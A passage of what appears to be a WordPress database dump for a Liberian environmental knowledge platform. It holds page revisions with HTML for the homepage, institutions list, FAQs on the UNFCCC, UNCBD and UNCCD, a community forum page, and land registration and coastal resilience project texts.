\n		<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-16 20:37:44','2019-11-16 20:37:44','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2548,1,'2019-11-18 11:32:38','2019-11-18 11:32:38','<h2>Institutions</h2>		\n	<a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_epa.jpg\" alt=\"Environmental Protection Agency\" width=\"1024\" height=\"563\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\">Environmental Protection Agency</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_fda0.jpg\" alt=\"Forestry Development Authority\" width=\"1024\" height=\"531\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_mme.jpg\" alt=\"Ministry of Mines and Energy\" width=\"1024\" height=\"482\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_lisgis.jpg\" alt=\"Liberia Institute for Statistics and Geo-Information Services\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/water-sanitation-and-hygiene-liberia/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_wash.jpg\" alt=\"Liberia National Water, Sanitation and Hygiene - WASH Commission\" width=\"1024\" height=\"522\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/water-sanitation-and-hygiene-liberia/\">Liberia National Water, Sanitation and Hygiene - WASH Commission</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Featured_lla.jpg\" alt=\"Liberia Land Authority\" width=\"1024\" height=\"502\"></a><a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\">Liberia Land Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ffi.png\" alt=\"Fauna &amp; Flora International\" width=\"1024\" height=\"504\"></a><a href=\"https://ekmsliberia.info/institutions-category/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\">Fauna & Flora International</a></h4>\n	<a href=\"https://ekmsliberia.info/institution/conservation-international/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ci.jpg\" alt=\"Conservation International\" width=\"1024\" height=\"523\"></a><a href=\"https://ekmsliberia.info/institutions-category/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/conservation-international/\">Conservation International</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-national-bureau-of-concessions/\">Liberia National Bureau of Concessions</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-agriculture/\">Ministry of Agriculture</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-transport/\">Ministry of Transport</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-fisheries-aquaculture-authority/\">National Fisheries & Aquaculture Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/institutions-category/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-18 11:32:38','2019-11-18 11:32:38','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(2549,1,'2019-11-18 11:39:37','2019-11-18 11:39:37','','','','publish','closed','closed','','2549','','','2019-11-18 11:39:37','2019-11-18 11:39:37','',2450,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2549',1,'condition_group','',0),(2550,1,'2019-11-18 14:38:48','2019-11-18 14:38:48','<h2>GENERAL </h2>		\n												<a href=\"\">What is the EKMS?</a>\n					<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other  Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.</p><p>It focuses on how the Rio conventions are being implemented in Liberia.</p>\n												<a href=\"\">Who can contribute to the EKMS?</a>\n					<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.</p>\n												<a href=\"\">How can i discussion on topics?</a>\n					<p>Join our community forum for free, if you are interested in discussing issues indepth. You can also share discussed topics with your own group on Facebook, Twitter, or Linkedin. Thank you for your interest in the EKMS.</p>\n												<a href=\"\">How can i find knowledge resources on the EKMS?</a>\n					<p>Use the smart search feature on the homepage to search for keywords or better still select a category.</p>\n			<h2>UNFCCC</h2>		\n												<a href=\"\">When should I accredit myself for UNFCCC meetings?</a>\n					<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.</p>\n												<a href=\"\">I want to get graphs and data about climate change. What is available and can I use it?</a>\n					<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.</p>\n												<a href=\"\">Are UNFCCC meetings open to the general public?</a>\n					<p>No, each participant must be properly accredited and registered.</p>\n												<a href=\"\">Who can participate in UNFCCC meetings and how do they accredit themselves?</a>\n					<p>There are different participation groups at UNFCCC meetings; these include:</p><ol><li><p><strong>Government delegate</strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the <a href=\"http://unfccc.int/parties_observers/parties/national_focal_points/items/9336.php\">National Focal Point</a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.</p></li><li><p><strong>Observers</strong> from admitted <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-ngos\" target=\"_self\" rel=\"noopener noreferrer\">non-governmental</a> or <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-igos\" target=\"_self\" rel=\"noopener noreferrer\">intergovernmental</a> organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the <a href=\"https://onlinereg.unfccc.int/\">online registration system</a> (ORS). Please see the <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/overview\" target=\"_self\" rel=\"noopener noreferrer\">civil society</a> web page for more information.</p></li><li><p><strong>Observer</strong> from a United Nations organization or specialized agency. Nominations are received from the respective organization.</p></li><li><p><strong>Member of the press</strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the <a href=\"http://unfccc.int/press/calender_of_events/accreditation/items/2987.php\">accreditation section</a>.</p></li></ol>\n												<a href=\"\">What is the purpose of the UNFCCC?</a>\n					<p>The UN Framework Convention on Climate Change (UNFCCC) is an intergovernmental treaty developed to address the problem of climate change.</p>\n												<a href=\"\">What is climate neutrality?</a>\n					<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth&#8217;s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.</p>\n			<h2>UNCBD</h2>		\n												<a href=\"\">What is the UNCBD?</a>\n					<p>The Convention on Biological Diversity (CBD) is an international legally-binding treaty with three main goals: conservation of biodiversity; sustainable use of biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.</p>\n												<a href=\"\">What is conservation of biodiversity?</a>\n					<p>Conservation of biological diversity leads to conservation of essential ecological diversity to preserve the continuity of food chains. The genetic diversity of plants and animals is preserved. Biodiversity conservation serves as an insurance policy for the future.</p>\n												<a href=\"\">What is the need of conducting a biodiversity meet?</a>\n					<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.</p>\n												<a href=\"\">How can we protect and preserve biodiversity?</a>\n					<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and protect beaches, parks, reserves, and fields where wild plants and animals live.</p>\n												<a href=\"\">What are some factors that affect biodiversity?</a>\n					<p>The loss of biodiversity affects the lives of more than 1 billion people living in dry lands.<br />5 major threats to biodiversity;<br />Climate change<br />Deforestation and habitat loss<br />Over-exploitation<br />Invasive species<br />Pollution</p>\n			<h2>UNCCD</h2>		\n												<a href=\"\">What is the importance of the UNCCD?</a>\n					<p>The United Nations Convention to Combat Desertification in Those Countries Experiencing Serious Drought and/or Desertification, Particularly in Africa (UNCCD) is a Convention to combat desertification and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by international cooperation and partnership arrangements.</p>\n												<a href=\"\">Is the UNCCD legally binding?</a>\n					<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management</p>\n												<a href=\"\">What is desertification?</a>\n					<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.</p>\n												<a href=\"\">Why is it important to combat desertification?</a>\n					<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land&#8217;s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined &#8211; are at risk of being displaced as a consequence of desertification.</p>\n												<a href=\"\">Is desertification a global problem?</a>\n					<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth&#8217;s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world&#8217;s poorest in over one hundred countries are threatened.</p>','Frequently Asked Questions','','inherit','closed','closed','','335-revision-v1','','','2019-11-18 14:38:48','2019-11-18 14:38:48','',335,'https://ekmsliberia.info/335-revision-v1/',0,'revision','',0),(2551,1,'2019-11-18 14:40:14','2019-11-18 14:40:14','<h2>GENERAL </h2>		\n												<a href=\"\">What is the EKMS?</a>\n					<p>The Environmental Knowledge Management System is a knowledge platform that strengthens institutional coordination between the Environmental Protection Agency (EPA), other  Government institutions that have direct linkages with environmental policies and development. This platform will increase access and dissemination of key information and promote inadequate public awareness and education.</p><p>It focuses on how the Rio conventions are being implemented in Liberia.</p>\n												<a href=\"\">Who can contribute to the EKMS?</a>\n					<p>Government Institutions, International and National NGOs that have direct linkages with environmental policies and development, are invited to join the EKMS team. Interested individuals could also submit useful data to the EKMS. Please see our institutions resources to know which institutions are currently participating.</p>\n												<a href=\"\">How can i discuss on topics?</a>\n					<p>Join our community forum for free, if you are interested in discussing issues indepth. You can also share discussed topics with your own group on Facebook, Twitter, or Linkedin. Thank you for your interest in the EKMS.</p>\n												<a href=\"\">How can i find knowledge resources on the EKMS?</a>\n					<p>Use the smart search feature on the homepage to search for keywords or better still select a category.</p>\n			<h2>UNFCCC</h2>		\n												<a href=\"\">When should I accredit myself for UNFCCC meetings?</a>\n					<p>Accreditation usually opens two months prior to the meeting. It is advisable to apply for accreditation in advance, to avoid any unnecessary delays at the meeting venue.</p>\n												<a href=\"\">I want to get graphs and data about climate change. What is available and can I use it?</a>\n					<p>All official texts, data and documents are in the public domain and may be freely downloaded, copied and printed provided no change to the content is introduced, and the source is acknowledged. You can find graphs and data in our background publications and the GHG data section of our website.</p>\n												<a href=\"\">Are UNFCCC meetings open to the general public?</a>\n					<p>No, each participant must be properly accredited and registered.</p>\n												<a href=\"\">Who can participate in UNFCCC meetings and how do they accredit themselves?</a>\n					<p>There are different participation groups at UNFCCC meetings; these include:</p><ol><li><p><strong>Government delegate</strong>, duly nominated as part of the official delegation from one of the Parties to the Convention and/or its Kyoto Protocol, or as a delegate from an observer State. Nominations for delegations are received from the respective governments, usually through the <a href=\"http://unfccc.int/parties_observers/parties/national_focal_points/items/9336.php\">National Focal Point</a>. For sessions of the COP and CMP, official credentials are issued by the Head of State or Government or by the Minister of Foreign Affairs.</p></li><li><p><strong>Observers</strong> from admitted <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-ngos\" target=\"_self\" rel=\"noopener noreferrer\">non-governmental</a> or <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/admitted-igos\" target=\"_self\" rel=\"noopener noreferrer\">intergovernmental</a> organizations. Nominations must be made by the Designated Contact Points of admitted organizations using the <a href=\"https://onlinereg.unfccc.int/\">online registration system</a> (ORS). Please see the <a href=\"https://unfccc.int/process-and-meetings/parties-non-party-stakeholders/non-party-stakeholders/overview\" target=\"_self\" rel=\"noopener noreferrer\">civil society</a> web page for more information.</p></li><li><p><strong>Observer</strong> from a United Nations organization or specialized agency. Nominations are received from the respective organization.</p></li><li><p><strong>Member of the press</strong>. Media participation at UNFCCC Conferences is subject to accreditation by the UNFCCC secretariat. Accreditation is strictly reserved for members of the press who fully meet UN media accreditation requirements. For more information, please visit the <a href=\"http://unfccc.int/press/calender_of_events/accreditation/items/2987.php\">accreditation section</a>.</p></li></ol>\n												<a href=\"\">What is the purpose of the UNFCCC?</a>\n					<p>The UN Framework Convention on Climate Change (UNFCCC) is an intergovernmental treaty developed to address the problem of climate change.</p>\n												<a href=\"\">What is climate neutrality?</a>\n					<p>Climate neutrality is achieved by balancing the amount of emissions generated with the Earth&#8217;s natural capacity of to absorb them. Climate neutrality is not necessarily about zero emissions. Instead, it is about reducing our current global emissions to the point where we reach a balance between our emissions and the absorptive capacity of the Earth.</p>\n			<h2>UNCBD</h2>		\n												<a href=\"\">What is the UNCBD?</a>\n					<p>The Convention on Biological Diversity (CBD) is an international legally-binding treaty with three main goals: conservation of biodiversity; sustainable use of biodiversity; fair and equitable sharing of the benefits arising from the use of genetic resources.</p>\n												<a href=\"\">What is conservation of biodiversity?</a>\n					<p>Conservation of biological diversity leads to conservation of essential ecological diversity to preserve the continuity of food chains. The genetic diversity of plants and animals is preserved. Biodiversity conservation serves as an insurance policy for the future.</p>\n												<a href=\"\">What is the need of conducting a biodiversity meet?</a>\n					<p>Biodiversity meet ensures awareness and some rules which leads to preservation of endangered and extincting species . This will unite all nations to conserve their biodiversity.</p>\n												<a href=\"\">How can we protect and preserve biodiversity?</a>\n					<p>Support the birds, reptiles, mammals, and plants that live in your neighborhood. You can also attract more wild species by providing water, food, shelter, and privacy. Explore habitats in your area. Help clean up and protect beaches, parks, reserves, and fields where wild plants and animals live.</p>\n												<a href=\"\">What are some factors that affect biodiversity?</a>\n					<p>The loss of biodiversity affects the lives of more than 1 billion people living in dry lands.<br />5 major threats to biodiversity;<br />Climate change<br />Deforestation and habitat loss<br />Over-exploitation<br />Invasive species<br />Pollution</p>\n			<h2>UNCCD</h2>		\n												<a href=\"\">What is the importance of the UNCCD?</a>\n					<p>The United Nations Convention to Combat Desertification in Those Countries Experiencing Serious Drought and/or Desertification, Particularly in Africa (UNCCD) is a Convention to combat desertification and mitigate the effects of drought through national action programs that incorporate long-term strategies supported by international cooperation and partnership arrangements.</p>\n												<a href=\"\">Is the UNCCD legally binding?</a>\n					<p>Established in 1994, the United Nations Convention to Combat Desertification (UNCCD) is the sole legally binding international agreement linking environment and development to sustainable land management</p>\n												<a href=\"\">What is desertification?</a>\n					<p>Desertification is not the natural expansion of existing deserts but the degradation of land in arid, semi-arid, and dry sub-humid areas. It is a gradual process of soil productivity loss and the thinning out of the vegetative cover because of human activities and climatic variations such as prolonged droughts and floods.</p>\n												<a href=\"\">Why is it important to combat desertification?</a>\n					<p>Desertification is at the root of political and socio-economic problems and poses a threat to the environmental equilibrium in affected regions. The land&#8217;s loss of productivity exacerbates poverty in the drylands, forcing its farmers to seek a way of living in more fertile lands or cities. In fact, 135 million people- the equivalent to the population of Germany and France combined &#8211; are at risk of being displaced as a consequence of desertification.</p>\n												<a href=\"\">Is desertification a global problem?</a>\n					<p>Desertification is a worldwide problem directly affecting 250 million people and a third of the earth&#8217;s land surface or over 4 billion hectares. In addition, the livelihoods of some one billion people who depend on land for most of their needs and usually the world&#8217;s poorest in over one hundred countries are threatened.</p>','Frequently Asked Questions','','inherit','closed','closed','','335-revision-v1','','','2019-11-18 14:40:14','2019-11-18 14:40:14','',335,'https://ekmsliberia.info/335-revision-v1/',0,'revision','',0),(2552,1,'2019-11-19 10:18:43','2019-11-19 10:18:43','<h2>The EKMS Community Forum</h2>		\n		<p>Like other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and/or topics of the Rio Conventions implementation in Liberia.</p><p>Generally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics <a style=\"color: #3366ff;\" href=\"https://ekms-liberia.mn.co/feed\" target=\"_blank\" rel=\"noopener noreferrer\">Click here</a>.</p><p>The key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues/questions relating to the Rio Conventions implementation in Liberia.</p><p>Feel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia. Discussion is by all means restricted to registered users only. If you are already a member of the EKMS community, please <a style=\"color: #3366ff;\" href=\"https://ekms-liberia.mn.co/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\" target=\"_blank\" rel=\"noopener noreferrer\">Sign In</a> or <a href=\"https://ekms-liberia.mn.co/?autojoin=1\" target=\"_blank\" rel=\"noopener noreferrer\">Join Us!</a></p><p><strong>Added Tools to the Community:</strong></p><p>Members Chat (Activated)</p><p>Group Chatting (In Progress)</p><p>Group online meetings hosting or Video Conferencing (In Progress)</p><p>Events Setup (In Progress)</p>','Join the Community','','inherit','closed','closed','','2503-revision-v1','','','2019-11-19 10:18:43','2019-11-19 10:18:43','',2503,'https://ekmsliberia.info/2503-revision-v1/',0,'revision','',0),(2553,1,'2019-11-19 10:19:24','2019-11-19 10:19:24','<h2>The EKMS Community Forum</h2>\nLike other Social Media sites such as Facebook and Twitter, the EKMS Community Forum is a place where people go to exchange ideas and talk about the growing agenda and/or topics of the Rio Conventions implementation in Liberia.\n\nGenerally, topics opened for discussions are about cross-cutting issues relating to biodiversity, climate change and ways to combat desertification. To explore forum topics <a style=\"color: #3366ff;\" href=\"https://ekms-liberia.mn.co/feed\" target=\"_blank\" rel=\"noopener noreferrer\">Click here</a>.\n\nThe key purpose of the community forum is to provide a vehicle for EKMS Knowledge Brokers to assist you in responding to technical questions or problems that might arise from using the Environmental Knowledge Management System website or issues/questions relating to the Rio Conventions implementation in Liberia.\n\nFeel free to discuss issues and submit questions or useful links regarding the implementation of the Rio conventions in Liberia. Discussion is by all means restricted to registered users only. If you are already a member of the EKMS community, please <a style=\"color: #3366ff;\" href=\"https://ekms-liberia.mn.co/sign_in?from=https%3A%2F%2Fekms-liberia.mn.co%2F\" target=\"_blank\" rel=\"noopener noreferrer\">Sign In</a> or <a href=\"https://ekms-liberia.mn.co/?autojoin=1\" target=\"_blank\" rel=\"noopener noreferrer\">Join Us!</a>\n\n<strong>Added Tools to the Community:</strong>\n\nMembers Chat (Activated)\n\nGroup Chatting (In Progress)\n\nGroup online meetings hosting or Video Conferencing (In Progress)\n\nEvents Setup (In Progress)','Join the Community','','inherit','closed','closed','','2503-revision-v1','','','2019-11-19 10:19:24','2019-11-19 10:19:24','',2503,'https://ekmsliberia.info/2503-revision-v1/',0,'revision','',0),(2554,1,'2019-11-19 12:26:01','2019-11-19 12:26:01','','Liberia Mineral Policy','','inherit','open','closed','','liberia-mineral-policy','','','2019-11-19 12:26:01','2019-11-19 12:26:01','',1701,'https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-Mineral-Policy.pdf',0,'attachment','application/pdf',0),(2555,1,'2019-11-19 12:32:15','2019-11-19 12:32:15','The individual ownership of land in Liberia has long been recognized and all such ownership stems from grants of land made to individuals and purchases from local people. Dealings in private lands are regulated by law and are recorded in a Deeds Registry. By the 1960s the\nstatus of information in the registries was so uncertain that in 1971 the government asked UNDP to provide assistance to undertake a pilot Cadastral Survey in Monrovia with the hopes to establishing an Office of Land Register to cure the defects of the existing system of\ndeeds registration. Following the enactment of the land registration law in 1974 (Chapter 8 of the Property Law) the government of Liberia began to implement a pilot systematic land title registration program. This activity ceased shortly after the coup in 1980.\n\nThe current situation in the deeds registry has not improved from the late 1970’s and in fact has probably gotten much worse to the point that there is currently a total lack of trust with the system. Many records were destroyed during the years of turmoil. Many transactions\nhave occurred with little reference to existing documents or previous transactions, leading to a situation of parcels being subdivided and sold with no accompanying adjustment to the mother deed. Many fraudulent documents have entered the system with little ability to correct the information prior to its being entered in the register. The overall result of this situation is that there exist seemingly valid yet conflicting documents, as well as many fraudulent documents registered with land-related Government institutions. As people are\ndissatisfied with the existing deed registration system, there is growing pressure to replace the\nexisting system with an alternative title registration system.','Title Registration Report','','inherit','closed','closed','','2297-autosave-v1','','','2019-11-19 12:32:15','2019-11-19 12:32:15','',2297,'https://ekmsliberia.info/2297-autosave-v1/',0,'revision','',0),(2558,1,'2019-11-19 16:48:00','2019-11-19 16:48:00','Coastal areas in Liberia are highly vulnerable to the consequences of climate change. A large proportion of the coastal community lives in temporary and poorly constructed housing with little protection from rising sea levels or storm surges. Many live on very low lying land, often in unplanned, illegal settlements and with the expected rise in sea levels as a result of climate change, combined with increasing storms and sea-surges with significant negative impacts on the lives and livelihoods of people in coastal areas. Already, major economic sectors like fishing and farming are seriously affected as a result of increasing displacement of people caused by flooding and other climate change related disasters.\r\n\r\nThe Enhancing Resilience of Vulnerable Coastal Areas to Climate Change Risks in Liberia (Coastal Project for short), is aimed at helping coastal communities in three counties develop defensive mechanism against the effects of climate change. The project, launched by the United Nations Development Programme and the Government of Liberia in 2010 aims to reduce vulnerability and build resilience of local communities and socio-economic sectors to withstand the threats of climate change in Liberia’s coastal areas. The project is implemented in three counties, hard hit by the effects of climate change – Grand Cape Mount, Montserrado and Grand Bassa.\r\n\r\nThe project demonstrates how low-cost, low-technology sustainable measures can be adapted to address the effects of climate change in the Liberian context. Through the Coastal Project, the selected communities showcase sustainable methods of community protection against rising sea levels, storms as well as how to manage coastal ecosystems.','Enhancing Resilience of Vulnerable Coastal Areas','','publish','closed','closed','','enhancing-resilience-of-vulnerable-coastal-areas','','','2019-11-20 11:54:28','2019-11-20 11:54:28','',0,'https://ekmsliberia.info/?post_type=project_resource&#038;p=2558',4,'project_resource','',0),(2560,1,'2019-11-19 16:48:00','2019-11-19 16:48:00','Coastal areas in Liberia are highly vulnerable to the consequences of climate change. A large proportion of the coastal community lives in temporary and poorly constructed housing with little protection from 